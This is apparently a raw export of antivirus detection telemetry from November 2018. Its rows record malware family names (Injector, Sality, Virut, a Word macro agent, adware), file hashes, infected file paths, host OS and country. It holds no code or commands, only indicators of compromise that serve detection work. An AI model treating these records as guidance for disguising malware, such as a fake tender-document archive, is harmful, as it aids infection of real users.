  Row(detection=Row(filename='tmp00000761', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp00000761', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052845-237d3943', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052845-237D3943', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062331-c9bb67f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062331-C9BB67F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061457-979e645c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061457-979E645C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053242-b0e974eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053242-B0E974EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Photoshop CS4\\Required\\Droplet Template.exe', filesize=512000, name='W32/Sality.AW.#M1.#R1'), hash='4b20b44adb2fff6b0d2f3b65bc1e8662005e375ce7104944a17e4b03dbe1be18', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:04:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130220-2f8095e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130220-2F8095E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:05:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055811-3fdfb5ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055811-3FDFB5BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053936-a7b1627d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053936-A7B1627D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061430-8777263a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061430-8777263A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055249-800de7cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055249-800DE7CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075c2', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075c2', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111920-788ecf1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_785069e3\\AVSCAN-20181102-111853-73EF13DB\\AVSCAN-20181102-111920-788ECF1B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-04d70e10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-04D70E10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051628-6c3453fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051628-6C3453FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054925-064999ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054925-064999AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052740-fc641571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052740-FC641571', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052914-3485ec65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052914-3485EC65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062153-8fcb0dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062153-8FCB0DC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-79e68378', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-79E68378', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060310-f24627f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060310-F24627F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061620-c94d63f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061620-C94D63F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055305-898d0302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055305-898D0302', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051820-aed1fbe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051820-AED1FBE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052358-787370aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052358-787370AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053637-3cb5be4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053637-3CB5BE4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050917-6b69dd05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050917-6B69DD05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053536-182960e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053536-182960E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055522-db8de426', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055522-DB8DE426', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061141-2290499e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061141-2290499E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052443-933fc31d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052443-933FC31D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055355-a742505f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055355-A742505F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055142-580e9a07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055142-580E9A07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061649-da43f086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061649-DA43F086', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060332-ffa23bf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060332-FFA23BF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-395f1df0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-395F1DF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='74ca4f86f469951767854c606368be43b4d9d4670b014b16b252ef8dd056b442', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051413-1b9641ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051413-1B9641BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055734-29e0dd20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055734-29E0DD20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053512-0a2ebd01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053512-0A2EBD01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051136-be11be7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051136-BE11BE7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062214-9c596fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062214-9C596FE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053801-6ec54cd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053801-6EC54CD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:04:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061534-adf3256f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061534-ADF3256F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7e7b046bbaa73f9da5cfcdd320d96985481a13aef7f15b00fa4e44f7f7ab0421', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-3\\7E7B046BBAA73F9DA5CFCDD320D96985481A13AEF7F15B00FA4E44F7F7AB0421', filesize=2048000, name='TR/Patched.Ren.Gen.#M300.#R3368'), hash='7e7b046bbaa73f9da5cfcdd320d96985481a13aef7f15b00fa4e44f7f7ab0421', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:13:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053723-5866b53f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053723-5866B53F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054320-2cfda483', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054320-2CFDA483', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:56:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055750-33b9ea06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055750-33B9EA06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054832-e6a7ae62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054832-E6A7AE62', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:30Z'), dt=datetime.date(2018, 11, 2)),
